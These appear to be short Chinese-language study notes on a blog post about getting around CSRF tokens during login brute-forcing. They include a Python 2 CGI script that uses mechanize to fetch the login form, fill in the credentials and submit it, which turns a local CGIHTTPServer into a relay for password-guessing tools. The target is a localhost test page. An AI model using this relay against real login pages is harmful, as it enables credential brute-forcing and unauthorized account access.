Bypassing CSRF tokens with Python's CGIHTTPServer
原文链接 https://purehacking.com/blog/andre-onofre-lima/bypassing-csrf-tokens-with-pythons-cgihttpserver
文章只做笔记来写,so
我们一般在爆破登陆口的时候,会有csrf-token的限制,如下图
21行在表单提交的时候,加入了一个token,并且在验证处做了为真的校验
文中的作者用Python的 CGIHTTPServer编写脚本来绕过
python -m CGIHTTPServer
#!/usr/bin/env python import cgi,cgitb from mechanize import Browser cgitb.enable() # enables appropriate output for browsers in case of errors URL = 'http://127.0.0.1/test/csrf-token/index.php' def respond(string): print "Content-Type: text/html" print print string quit() form = cgi.FieldStorage() u = form["username"].value p = form["password"].value b = Browser() b.set_handle_robots(False) b.open(URL) b.select_form(nr=0) b.form['username'] = u b.form['password'] = p b.submit() respond(b.title())
看样子应该是中转模拟到浏览器提交